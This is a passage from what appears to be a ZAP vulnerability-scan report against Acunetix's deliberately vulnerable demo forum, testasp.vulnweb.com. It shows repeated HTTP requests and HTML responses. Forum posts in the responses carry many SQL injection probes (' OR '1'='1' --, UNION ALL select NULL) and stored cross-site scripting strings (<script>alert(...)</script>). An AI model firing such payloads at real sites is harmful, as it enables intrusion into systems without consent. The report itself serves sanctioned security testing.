Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 4913 |
| Response Body - size: 4,913 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
